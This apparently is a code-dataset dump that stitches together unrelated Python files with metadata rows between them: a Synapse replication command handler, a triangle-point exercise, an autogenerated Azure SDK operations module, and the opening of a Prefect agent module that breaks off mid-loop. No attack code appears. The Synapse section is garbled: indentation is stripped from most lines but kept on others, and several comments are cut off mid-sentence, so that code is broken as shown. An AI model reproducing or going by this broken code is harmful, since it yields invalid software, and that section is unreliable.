remove_pusher_counter = Counter("synapse_replication_tcp_resource_remove_pusher", "")
user_ip_cache_counter = Counter("synapse_replication_tcp_resource_user_ip_cache", "")
_StreamCommandQueue = Deque[
Tuple[Union[RdataCommand, PositionCommand], AbstractConnection]
]
class ReplicationCommandHandler:
def __init__(self, hs):
self._replication_data_handler = hs.get_replication_data_handler()
self._presence_handler = hs.get_presence_handler()
self._store = hs.get_datastore()
self._notifier = hs.get_notifier()
self._clock = hs.get_clock()
self._instance_id = hs.get_instance_id()
self._instance_name = hs.get_instance_name()
self._streams = {
stream.NAME: stream(hs) for stream in STREAMS_MAP.values()
}
self._streams_to_replicate = []
for stream in self._streams.values():
if stream.NAME == CachesStream.NAME:
self._streams_to_replicate.append(stream)
continue
if isinstance(stream, (EventsStream, BackfillStream)):
if hs.config.worker.writers.events == hs.get_instance_name():
self._streams_to_replicate.append(stream)
continue
if isinstance(stream, TypingStream):
if hs.config.worker.writers.typing == hs.get_instance_name():
self._streams_to_replicate.append(stream)
continue
if hs.config.worker_app is not None:
continue
if stream.NAME == FederationStream.NAME and hs.config.send_federation:
# We only support federation stream if federation sending
# has been disabled on the master.
continue
self._streams_to_replicate.append(stream)
# Map of stream name to batched updates. See RdataCommand for info on
# how batching works.
self._pending_batches = {} # type: Dict[str, List[Any]]
# The factory used to create connections.
self._factory = None # type: Optional[ReconnectingClientFactory]
# The currently connected connections. (The list of places we need to send
# outgoing replication commands to.)
self._connections = [] # type: List[AbstractConnection]
LaterGauge(
"synapse_replication_tcp_resource_total_connections",
"",
[],
lambda: len(self._connections),
)
# When POSITION or RDATA commands arrive, we stick them in a queue and process
# them in order in a separate background process.
# the streams which are currently being processed by _unsafe_process_queue
self._processing_streams = set() # type: Set[str]
# for each stream, a queue of commands that are awaiting processing, and the
# connection that they arrived on.
self._command_queues_by_stream = {
stream_name: _StreamCommandQueue() for stream_name in self._streams
}
# For each connection, the incoming stream names that have received a POSITION
# from that connection.
self._streams_by_connection = {} # type: Dict[AbstractConnection, Set[str]]
LaterGauge(
"synapse_replication_tcp_command_queue",
"Number of inbound RDATA/POSITION commands queued for processing",
["stream_name"],
lambda: {
(stream_name,): len(queue)
for stream_name, queue in self._command_queues_by_stream.items()
},
)
self._is_master = hs.config.worker_app is None
self._federation_sender = None
if self._is_master and not hs.config.send_federation:
self._federation_sender = hs.get_federation_sender()
self._server_notices_sender = None
if self._is_master:
self._server_notices_sender = hs.get_server_notices_sender()
def _add_command_to_stream_queue(
self, conn: AbstractConnection, cmd: Union[RdataCommand, PositionCommand]
) -> None:
stream_name = cmd.stream_name
queue = self._command_queues_by_stream.get(stream_name)
if queue is None:
logger.error("Got %s for unknown stream: %s", cmd.NAME, stream_name)
return
queue.append((cmd, conn))
# if we're already processing this stream, there's nothing more to do:
# the new entry on the queue will get picked up in due course
if stream_name in self._processing_streams:
return
# fire off a background process to start processing the queue.
run_as_background_process(
"process-replication-data", self._unsafe_process_queue, stream_name
)
async def _unsafe_process_queue(self, stream_name: str):
assert stream_name not in self._processing_streams
self._processing_streams.add(stream_name)
try:
queue = self._command_queues_by_stream.get(stream_name)
while queue:
cmd, conn = queue.popleft()
try:
await self._process_command(cmd, conn, stream_name)
except Exception:
logger.exception("Failed to handle command %s", cmd)
finally:
self._processing_streams.discard(stream_name)
async def _process_command(
self,
cmd: Union[PositionCommand, RdataCommand],
conn: AbstractConnection,
stream_name: str,
) -> None:
if isinstance(cmd, PositionCommand):
await self._process_position(stream_name, conn, cmd)
elif isinstance(cmd, RdataCommand):
await self._process_rdata(stream_name, conn, cmd)
else:
# This shouldn't be possible
raise Exception("Unrecognised command %s in stream queue", cmd.NAME)
def start_replication(self, hs):
if hs.config.redis.redis_enabled:
import txredisapi
from synapse.replication.tcp.redis import (
RedisDirectTcpReplicationClientFactory,
)
logger.info(
"Connecting to redis (host=%r port=%r)",
hs.config.redis_host,
hs.config.redis_port,
)
hs.get_replication_streamer()
# We need two connections to redis, one for the subscription stream and
# one to send commands to (as you can't send further redis commands to a
outbound_redis_connection = txredisapi.lazyConnection(
host=hs.config.redis_host,
port=hs.config.redis_port,
password=hs.config.redis.redis_password,
reconnect=True,
)
self._factory = RedisDirectTcpReplicationClientFactory(
hs, outbound_redis_connection
)
hs.get_reactor().connectTCP(
hs.config.redis.redis_host, hs.config.redis.redis_port, self._factory,
)
else:
client_name = hs.get_instance_name()
self._factory = DirectTcpReplicationClientFactory(hs, client_name, self)
host = hs.config.worker_replication_host
port = hs.config.worker_replication_port
hs.get_reactor().connectTCP(host, port, self._factory)
def get_streams(self) -> Dict[str, Stream]:
return self._streams
def get_streams_to_replicate(self) -> List[Stream]:
return self._streams_to_replicate
def on_REPLICATE(self, conn: AbstractConnection, cmd: ReplicateCommand):
self.send_positions_to_connection(conn)
def send_positions_to_connection(self, conn: AbstractConnection):
for stream in self.get_streams_to_replicate():
self.send_command(
PositionCommand(
stream.NAME,
self._instance_name,
stream.current_token(self._instance_name),
)
)
def on_USER_SYNC(
self, conn: AbstractConnection, cmd: UserSyncCommand
) -> Optional[Awaitable[None]]:
user_sync_counter.inc()
if self._is_master:
return self._presence_handler.update_external_syncs_row(
cmd.instance_id, cmd.user_id, cmd.is_syncing, cmd.last_sync_ms
)
else:
return None
def on_CLEAR_USER_SYNC(
self, conn: AbstractConnection, cmd: ClearUserSyncsCommand
) -> Optional[Awaitable[None]]:
if self._is_master:
return self._presence_handler.update_external_syncs_clear(cmd.instance_id)
else:
return None
def on_FEDERATION_ACK(self, conn: AbstractConnection, cmd: FederationAckCommand):
federation_ack_counter.inc()
if self._federation_sender:
self._federation_sender.federation_ack(cmd.instance_name, cmd.token)
def on_REMOVE_PUSHER(
self, conn: AbstractConnection, cmd: RemovePusherCommand
) -> Optional[Awaitable[None]]:
remove_pusher_counter.inc()
if self._is_master:
return self._handle_remove_pusher(cmd)
else:
return None
async def _handle_remove_pusher(self, cmd: RemovePusherCommand):
await self._store.delete_pusher_by_app_id_pushkey_user_id(
app_id=cmd.app_id, pushkey=cmd.push_key, user_id=cmd.user_id
)
self._notifier.on_new_replication_data()
def on_USER_IP(
self, conn: AbstractConnection, cmd: UserIpCommand
) -> Optional[Awaitable[None]]:
user_ip_cache_counter.inc()
if self._is_master:
return self._handle_user_ip(cmd)
else:
return None
async def _handle_user_ip(self, cmd: UserIpCommand):
await self._store.insert_client_ip(
cmd.user_id,
cmd.access_token,
cmd.ip,
cmd.user_agent,
cmd.device_id,
cmd.last_seen,
)
assert self._server_notices_sender is not None
await self._server_notices_sender.on_user_ip(cmd.user_id)
def on_RDATA(self, conn: AbstractConnection, cmd: RdataCommand):
if cmd.instance_name == self._instance_name:
return
stream_name = cmd.stream_name
inbound_rdata_count.labels(stream_name).inc()
# same stream, and
# 2. so we don't race with getting a POSITION command and fetching
self._add_command_to_stream_queue(conn, cmd)
async def _process_rdata(
self, stream_name: str, conn: AbstractConnection, cmd: RdataCommand
) -> None:
try:
row = STREAMS_MAP[stream_name].parse_row(cmd.row)
except Exception as e:
raise Exception(
"Failed to parse RDATA: %r %r" % (stream_name, cmd.row)
) from e
# connection*. (A POSITION on another connection is no good, as there
# is no guarantee that we have seen all the intermediate updates.)
sbc = self._streams_by_connection.get(conn)
if not sbc or stream_name not in sbc:
# Let's drop the row for now, on the assumption we'll receive a
# `POSITION` soon and we'll catch up correctly then.
logger.debug(
"Discarding RDATA for unconnected stream %s -> %s",
stream_name,
cmd.token,
)
return
if cmd.token is None:
self._pending_batches.setdefault(stream_name, []).append(row)
return
rows = self._pending_batches.pop(stream_name, [])
rows.append(row)
stream = self._streams[stream_name]
current_token = stream.current_token(cmd.instance_name)
if cmd.token <= current_token:
logger.debug(
"Discarding RDATA from stream %s at position %s before previous position %s",
stream_name,
cmd.token,
current_token,
)
else:
await self.on_rdata(stream_name, cmd.instance_name, cmd.token, rows)
async def on_rdata(
self, stream_name: str, instance_name: str, token: int, rows: list
):
logger.debug("Received rdata %s (%s) -> %s", stream_name, instance_name, token)
await self._replication_data_handler.on_rdata(
stream_name, instance_name, token, rows
)
def on_POSITION(self, conn: AbstractConnection, cmd: PositionCommand):
if cmd.instance_name == self._instance_name:
return
logger.info("Handling '%s %s'", cmd.NAME, cmd.to_line())
self._add_command_to_stream_queue(conn, cmd)
async def _process_position(
self, stream_name: str, conn: AbstractConnection, cmd: PositionCommand
) -> None:
stream = self._streams[stream_name]
# of connected streams.
for streams in self._streams_by_connection.values():
streams.discard(stream_name)
# We clear the pending batches for the stream as the fetching of the
# missing updates below will fetch all rows in the batch.
self._pending_batches.pop(stream_name, [])
# Find where we previously streamed up to.
current_token = stream.current_token(cmd.instance_name)
# If the position token matches our current token then we're up to
# between then and now.
missing_updates = cmd.token != current_token
while missing_updates:
logger.info(
"Fetching replication rows for '%s' between %i and %i",
stream_name,
current_token,
cmd.token,
)
(updates, current_token, missing_updates) = await stream.get_updates_since(
cmd.instance_name, current_token, cmd.token
)
# TODO: add some tests for this
# Some streams return multiple rows with the same stream IDs,
# which need to be processed in batches.
for token, rows in _batch_updates(updates):
await self.on_rdata(
stream_name,
cmd.instance_name,
token,
[stream.parse_row(row) for row in rows],
)
logger.info("Caught up with stream '%s' to %i", stream_name, cmd.token)
# We've now caught up to position sent to us, notify handler.
await self._replication_data_handler.on_position(
cmd.stream_name, cmd.instance_name, cmd.token
)
self._streams_by_connection.setdefault(conn, set()).add(stream_name)
    def on_REMOTE_SERVER_UP(self, conn: AbstractConnection, cmd: RemoteServerUpCommand):
        """Handle notification that a remote server has come back up."""
        self._replication_data_handler.on_remote_server_up(cmd.data)
        self._notifier.notify_remote_server_up(cmd.data)
        # Relay the command onwards, skipping the connection it arrived on.
        # For direct TCP connections this will relay to all other connections
        # connected to us. When on master this will correctly fan out to all
        # other direct TCP clients and on workers there'll only be the one
        # connection back to master, so in that case the relay is a no-op (all
        # instances will have already received the same REMOTE_SERVER_UP
        # command).
        self.send_command(cmd, ignore_conn=conn)
    def new_connection(self, connection: AbstractConnection):
        """Called when a new replication connection has been established."""
        self._connections.append(connection)
        # If we are connected to replication as a client (rather than a server)
        # tell the client the connection attempt succeeded so it resets its
        # reconnect back-off delay; this stops us from tightlooping on
        # reconnection if something fails after this point and we drop the
        # connection.
        if self._factory:
            self._factory.resetDelay()
        # Tell the other end our current set of syncing users so presence
        # state is correct after a reconnect.
        currently_syncing = (
            self._presence_handler.get_currently_syncing_users_for_replication()
        )
        now = self._clock.time_msec()
        for user_id in currently_syncing:
            connection.send_command(
                UserSyncCommand(self._instance_id, user_id, True, now)
            )
def lost_connection(self, connection: AbstractConnection):
streams = self._streams_by_connection.pop(connection, None)
if streams:
logger.info(
"Lost replication connection; streams now disconnected: %s", streams
)
try:
self._connections.remove(connection)
except ValueError:
pass
def connected(self) -> bool:
return bool(self._connections)
def send_command(
self, cmd: Command, ignore_conn: Optional[AbstractConnection] = None
):
if self._connections:
for connection in self._connections:
if connection == ignore_conn:
continue
try:
connection.send_command(cmd)
except Exception:
logger.exception(
"Failed to write command %s to connection %s",
cmd.NAME,
connection,
)
else:
logger.warning("Dropping command as not connected: %r", cmd.NAME)
    def send_federation_ack(self, token: int):
        """Ack data for the federation stream up to the given token."""
        self.send_command(FederationAckCommand(self._instance_name, token))
    def send_user_sync(
        self, instance_id: str, user_id: str, is_syncing: bool, last_sync_ms: int
    ):
        """Broadcast that a user has started or stopped syncing on an instance."""
        self.send_command(
            UserSyncCommand(instance_id, user_id, is_syncing, last_sync_ms)
        )
    def send_remove_pusher(self, app_id: str, push_key: str, user_id: str):
        """Broadcast a request to remove the given pusher for a user."""
        cmd = RemovePusherCommand(app_id, push_key, user_id)
        self.send_command(cmd)
    def send_user_ip(
        self,
        user_id: str,
        access_token: str,
        ip: str,
        user_agent: str,
        device_id: str,
        last_seen: int,
    ):
        """Broadcast that a client has connected with the given IP/user-agent."""
        cmd = UserIpCommand(user_id, access_token, ip, user_agent, device_id, last_seen)
        self.send_command(cmd)
    def send_remote_server_up(self, server: str):
        """Broadcast that a remote server has been detected as having come back up."""
        self.send_command(RemoteServerUpCommand(server))
    def stream_update(self, stream_name: str, token: str, data: Any):
        """Broadcast an RDATA for `stream_name` at `token` to all connections."""
        # NOTE(review): `token` is annotated `str` here but is `int` in
        # on_rdata/_process_position — confirm which is intended.
        self.send_command(RdataCommand(stream_name, self._instance_name, token, data))
# Generic (token, row) element types consumed by _batch_updates below.
UpdateToken = TypeVar("UpdateToken")
UpdateRow = TypeVar("UpdateRow")
def _batch_updates(
updates: Iterable[Tuple[UpdateToken, UpdateRow]]
) -> Iterator[Tuple[UpdateToken, List[UpdateRow]]]:
update_iter = iter(updates)
first_update = next(update_iter, None)
if first_update is None:
# empty input
return
current_batch_token = first_update[0]
current_batch = [first_update[1]]
for token, row in update_iter:
if token != current_batch_token:
# different token to the previous row: flush the previous
# batch and start anew
yield current_batch_token, current_batch
current_batch_token = token
current_batch = []
current_batch.append(row)
# flush the final batch
yield current_batch_token, current_batch
| true | true |
1c303f70e9a7325250f4f9ef21e32dd6200a33f3 | 545 | py | Python | Courses/YandexAlgo/1/triangle_point.py | searayeah/sublime-snippets | deff53a06948691cd5e5d7dcfa85515ddd8fab0b | [
"MIT"
] | null | null | null | Courses/YandexAlgo/1/triangle_point.py | searayeah/sublime-snippets | deff53a06948691cd5e5d7dcfa85515ddd8fab0b | [
"MIT"
] | null | null | null | Courses/YandexAlgo/1/triangle_point.py | searayeah/sublime-snippets | deff53a06948691cd5e5d7dcfa85515ddd8fab0b | [
"MIT"
] | null | null | null | def dist(x1, y1, x2, y2):
return ((x1 - x2) ** 2 + (y1 - y2) ** 2) ** 0.5
def solve():
d = int(input())
x, y = map(int, input().split())
if (y <= -x + d) and (x >= 0) and (y >= 0):
return 0
else:
a = dist(0, 0, x, y)
b = dist(d, 0, x, y)
c = dist(0, d, x, y)
if a <= b:
if a <= c:
return 1
else:
return 3
else:
if b <= c:
return 2
else:
return 3
print(solve())
| 20.185185 | 51 | 0.33578 | def dist(x1, y1, x2, y2):
return ((x1 - x2) ** 2 + (y1 - y2) ** 2) ** 0.5
def solve():
d = int(input())
x, y = map(int, input().split())
if (y <= -x + d) and (x >= 0) and (y >= 0):
return 0
else:
a = dist(0, 0, x, y)
b = dist(d, 0, x, y)
c = dist(0, d, x, y)
if a <= b:
if a <= c:
return 1
else:
return 3
else:
if b <= c:
return 2
else:
return 3
print(solve())
| true | true |
1c30415163ecfaf1b9ac21056ac2ad3ebdfacf67 | 5,798 | py | Python | sdk/appservice/azure-mgmt-web/azure/mgmt/web/v2020_06_01/operations/_domain_registration_provider_operations.py | vincenttran-msft/azure-sdk-for-python | 348b56f9f03eeb3f7b502eed51daf494ffff874d | [
"MIT"
] | 1 | 2021-09-07T18:39:05.000Z | 2021-09-07T18:39:05.000Z | sdk/appservice/azure-mgmt-web/azure/mgmt/web/v2020_06_01/operations/_domain_registration_provider_operations.py | vincenttran-msft/azure-sdk-for-python | 348b56f9f03eeb3f7b502eed51daf494ffff874d | [
"MIT"
] | null | null | null | sdk/appservice/azure-mgmt-web/azure/mgmt/web/v2020_06_01/operations/_domain_registration_provider_operations.py | vincenttran-msft/azure-sdk-for-python | 348b56f9f03eeb3f7b502eed51daf494ffff874d | [
"MIT"
] | 1 | 2022-03-04T06:21:56.000Z | 2022-03-04T06:21:56.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.mgmt.core.exceptions import ARMErrorFormat
from msrest import Serializer
from .. import models as _models
from .._vendor import _convert_request
# Type of the optional `cls` callback that post-processes the raw response.
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
# Module-level serializer used to encode query and header parameters.
_SERIALIZER = Serializer()
_SERIALIZER.client_side_validation = False
def build_list_operations_request(
    **kwargs: Any
) -> HttpRequest:
    """Build the GET request that lists Microsoft.DomainRegistration operations.

    Recognised kwargs: ``template_url`` (override the request path),
    ``params`` (extra query parameters) and ``headers`` (extra headers).
    Any remaining kwargs are forwarded to :class:`HttpRequest`.
    """
    api_version = "2020-06-01"
    accept = "application/json"
    request_url = kwargs.pop("template_url", '/providers/Microsoft.DomainRegistration/operations')
    # Query parameters: pin the service api-version.
    params = kwargs.pop("params", {})  # type: Dict[str, Any]
    params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
    # Headers: always request a JSON response.
    headers = kwargs.pop("headers", {})  # type: Dict[str, Any]
    headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
    return HttpRequest(method="GET", url=request_url, params=params, headers=headers, **kwargs)
class DomainRegistrationProviderOperations(object):
    """DomainRegistrationProviderOperations operations.
    You should not instantiate this class directly. Instead, you should create a Client instance that
    instantiates it for you and attaches it as an attribute.
    :ivar models: Alias to model classes used in this operation group.
    :type models: ~azure.mgmt.web.v2020_06_01.models
    :param client: Client for service requests.
    :param config: Configuration of service client.
    :param serializer: An object model serializer.
    :param deserializer: An object model deserializer.
    """
    models = _models
    def __init__(self, client, config, serializer, deserializer):
        self._client = client
        self._serialize = serializer
        self._deserialize = deserializer
        self._config = config
    @distributed_trace
    def list_operations(
        self,
        **kwargs: Any
    ) -> Iterable["_models.CsmOperationCollection"]:
        """Implements Csm operations Api to exposes the list of available Csm Apis under the resource
        provider.
        Description for Implements Csm operations Api to exposes the list of available Csm Apis under
        the resource provider.
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either CsmOperationCollection or the result of
         cls(response)
        :rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.web.v2020_06_01.models.CsmOperationCollection]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None) # type: ClsType["_models.CsmOperationCollection"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        def prepare_request(next_link=None):
            # First page uses the canonical operations URL; later pages follow
            # the service-provided nextLink.
            if not next_link:
                request = build_list_operations_request(
                    template_url=self.list_operations.metadata['url'],
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)
            else:
                request = build_list_operations_request(
                    template_url=next_link,
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)
                request.method = "GET"
            return request
        def extract_data(pipeline_response):
            # Deserialize one page and hand back (next_link, items) for paging.
            deserialized = self._deserialize("CsmOperationCollection", pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.next_link or None, iter(list_of_elem)
        def get_next(next_link=None):
            # Fetch one page, mapping non-200 responses to typed errors.
            request = prepare_request(next_link)
            pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response
            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
                raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
            return pipeline_response
        return ItemPaged(
            get_next, extract_data
        )
    list_operations.metadata = {'url': '/providers/Microsoft.DomainRegistration/operations'} # type: ignore
| 41.120567 | 133 | 0.673163 |
import functools
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.mgmt.core.exceptions import ARMErrorFormat
from msrest import Serializer
from .. import models as _models
from .._vendor import _convert_request
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
_SERIALIZER = Serializer()
_SERIALIZER.client_side_validation = False
def build_list_operations_request(
**kwargs: Any
) -> HttpRequest:
api_version = "2020-06-01"
accept = "application/json"
url = kwargs.pop("template_url", '/providers/Microsoft.DomainRegistration/operations')
query_parameters = kwargs.pop("params", {})
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
header_parameters = kwargs.pop("headers", {})
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
class DomainRegistrationProviderOperations(object):
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
@distributed_trace
def list_operations(
self,
**kwargs: Any
) -> Iterable["_models.CsmOperationCollection"]:
cls = kwargs.pop('cls', None)
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_operations_request(
template_url=self.list_operations.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_operations_request(
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("CsmOperationCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_operations.metadata = {'url': '/providers/Microsoft.DomainRegistration/operations'}
| true | true |
1c30418c3026c3a9282d3709ebe6c9102418233c | 23,942 | py | Python | src/prefect/agent/agent.py | Ashton-Sidhu/prefect | a88c86174b70b9de6c110f1c1524b70d4b18b96e | [
"Apache-2.0"
] | 2 | 2020-09-04T10:05:55.000Z | 2020-09-04T10:06:32.000Z | src/prefect/agent/agent.py | workflowmate/prefect | b893c5c69fecd1d66786bbe4c3cc6264d759f1e6 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | src/prefect/agent/agent.py | workflowmate/prefect | b893c5c69fecd1d66786bbe4c3cc6264d759f1e6 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | import functools
import logging
import math
import os
import signal
import sys
import threading
import time
from concurrent.futures import Future, ThreadPoolExecutor
from contextlib import contextmanager
from typing import Any, Generator, Iterable, Set, Optional, cast
from urllib.parse import urlparse
import pendulum
from tornado import web
from tornado.ioloop import IOLoop
from prefect import config
from prefect.client import Client
from prefect.engine.state import Failed, Submitted
from prefect.serialization import state
from prefect.utilities.context import context
from prefect.utilities.exceptions import AuthorizationError
from prefect.utilities.graphql import GraphQLResult, with_args
ascii_name = r"""
____ __ _ _ _
| _ \ _ __ ___ / _| ___ ___| |_ / \ __ _ ___ _ __ | |_
| |_) | '__/ _ \ |_ / _ \/ __| __| / _ \ / _` |/ _ \ '_ \| __|
| __/| | | __/ _| __/ (__| |_ / ___ \ (_| | __/ | | | |_
|_| |_| \___|_| \___|\___|\__| /_/ \_\__, |\___|_| |_|\__|
|___/
"""
# Event used to wake the agent's polling loop early instead of waiting out the
# backoff sleep. Set by the /api/poke endpoint and by the SIGINT exit handler.
AGENT_WAKE_EVENT = threading.Event()
@contextmanager
def exit_handler(agent: "Agent") -> Generator:
    """Install a SIGINT handler for the duration of the block.

    Yields a `threading.Event` that is set when a keyboard interrupt is
    received, so the agent loop can notice it and shut down cleanly. The
    previous SIGINT handler is restored on exit, and `SystemExit` raised
    inside the block is swallowed.
    """
    stop_requested = threading.Event()

    def _on_sigint(*_args: Any, **_kwargs: Any) -> None:
        agent.logger.info("Keyboard Interrupt received: Agent is shutting down.")
        stop_requested.set()
        # Also wake the poll loop so the shutdown is noticed immediately.
        AGENT_WAKE_EVENT.set()

    previous_handler = signal.getsignal(signal.SIGINT)
    try:
        signal.signal(signal.SIGINT, _on_sigint)
        yield stop_requested
    except SystemExit:
        pass
    finally:
        signal.signal(signal.SIGINT, previous_handler)
class HealthHandler(web.RequestHandler):
    """Respond to GET /api/health with an empty JSON object (liveness probe)."""
    def get(self) -> None:
        # Empty json blob, may add more info later
        self.write({})
class PokeHandler(web.RequestHandler):
    """Respond to GET /api/poke.
    The handler is expected to be called by an external process to notify the
    agent that flow runs are waiting for execution, so it does not have to
    wait out its polling backoff interval.
    """
    def get(self) -> None:
        # Wake up agent that might be waiting for interval loop to complete.
        AGENT_WAKE_EVENT.set()
class Agent:
    """
    Base class for Agents. Information on using the Prefect agents can be found at
    https://docs.prefect.io/orchestration/agents/overview.html
    This Agent class is a standard point for executing Flows in Prefect Cloud. It is meant to
    have subclasses which inherit functionality from this class. The only piece that the
    subclasses should implement is the `deploy_flows` function, which specifies how to run a
    Flow on the given platform. It is built in this way to keep Prefect Cloud logic standard
    but allows for platform specific customizability.
    In order for this to operate `PREFECT__CLOUD__AGENT__AUTH_TOKEN` must be set as an
    environment variable or in your user configuration file.
    Args:
        - name (str, optional): An optional name to give this agent. Can also be set through
            the environment variable `PREFECT__CLOUD__AGENT__NAME`. Defaults to "agent"
        - labels (List[str], optional): a list of labels, which are arbitrary string
            identifiers used by Prefect Agents when polling for work
        - env_vars (dict, optional): a dictionary of environment variables and values that will
            be set on each flow run that this agent submits for execution
        - max_polls (int, optional): maximum number of times the agent will poll Prefect Cloud
            for flow runs; defaults to infinite
        - agent_address (str, optional): Address to serve internal api at. Currently this is
            just health checks for use by an orchestration layer. Leave blank for no api server
            (default).
        - no_cloud_logs (bool, optional): Disable logging to a Prefect backend for this agent
            and all deployed flow runs
    """
    def __init__(
        self,
        name: str = None,
        labels: Iterable[str] = None,
        env_vars: dict = None,
        max_polls: int = None,
        agent_address: str = None,
        no_cloud_logs: bool = False,
    ) -> None:
        self.name = name or config.cloud.agent.get("name", "agent")
        self.labels = labels or list(config.cloud.agent.get("labels", []))
        self.env_vars = env_vars or config.cloud.agent.get("env_vars", dict())
        self.max_polls = max_polls
        self.log_to_cloud = False if no_cloud_logs else True
        self.agent_address = agent_address or config.cloud.agent.get(
            "agent_address", ""
        )
        # Internal API server state; populated by setup() when agent_address
        # is configured, torn down again by cleanup().
        self._api_server = None # type: ignore
        self._api_server_loop = None # type: Optional[IOLoop]
        self._api_server_thread = None # type: Optional[threading.Thread]
        logger = logging.getLogger(self.name)
        logger.setLevel(config.cloud.agent.get("level"))
        if not any([isinstance(h, logging.StreamHandler) for h in logger.handlers]):
            ch = logging.StreamHandler(sys.stdout)
            formatter = logging.Formatter(context.config.logging.format)
            formatter.converter = time.gmtime # type: ignore
            ch.setFormatter(formatter)
            logger.addHandler(ch)
        self.logger = logger
        # Flow run ids currently being submitted in background threads.
        self.submitting_flow_runs = set() # type: Set[str]
        self.logger.debug("Verbose logs enabled")
        self.logger.debug(f"Environment variables: {[*self.env_vars]}")
        self.logger.debug(f"Max polls: {self.max_polls}")
        self.logger.debug(f"Agent address: {self.agent_address}")
        self.logger.debug(f"Log to Cloud: {self.log_to_cloud}")
        token = config.cloud.agent.get("auth_token")
        self.logger.debug(f"Prefect backend: {config.backend}")
        self.client = Client(api_token=token)
    def _verify_token(self, token: str) -> None:
        """
        Checks whether a token with a `RUNNER` scope was provided
        Args:
            - token (str): The provided agent token to verify
        Raises:
            - AuthorizationError: if token is empty or does not have a RUNNER role
        """
        if not token:
            raise AuthorizationError("No agent API token provided.")
        # Check if RUNNER role
        result = self.client.graphql(query="query { auth_info { api_token_scope } }")
        if (
            not result.data # type: ignore
            or result.data.auth_info.api_token_scope != "RUNNER" # type: ignore
        ):
            raise AuthorizationError("Provided token does not have a RUNNER scope.")
    def _register_agent(self) -> str:
        """
        Register this agent with Prefect Cloud and retrieve agent ID
        Returns:
            - The agent ID as a string
        """
        agent_id = self.client.register_agent(
            agent_type=type(self).__name__, name=self.name, labels=self.labels # type: ignore
        )
        self.logger.debug(f"Agent ID: {agent_id}")
        return agent_id
    def start(self, _loop_intervals: dict = None) -> None:
        """
        The main entrypoint to the agent. This function loops and constantly polls for
        new flow runs to deploy
        Args:
            - _loop_intervals (dict, optional): Exposed for testing only.
        """
        if config.backend == "cloud":
            self._verify_token(self.client.get_auth_token())
            self.client.attach_headers({"X-PREFECT-AGENT-ID": self._register_agent()})
        try:
            self.setup()
            with exit_handler(self) as exit_event:
                # Loop intervals for query sleep backoff
                loop_intervals = _loop_intervals or {
                    0: 0.25,
                    1: 0.5,
                    2: 1.0,
                    3: 2.0,
                    4: 4.0,
                    5: 8.0,
                    6: 10.0,
                }
                index = 0
                remaining_polls = math.inf if self.max_polls is None else self.max_polls
                # the max workers default has changed in 3.8. For stable results the
                # default 3.8 behavior is elected here.
                max_workers = min(32, (os.cpu_count() or 1) + 4)
                with ThreadPoolExecutor(max_workers=max_workers) as executor:
                    self.logger.debug("Max Workers: {}".format(max_workers))
                    while not exit_event.is_set() and remaining_polls:
                        # Reset the event in case it was set by poke handler.
                        AGENT_WAKE_EVENT.clear()
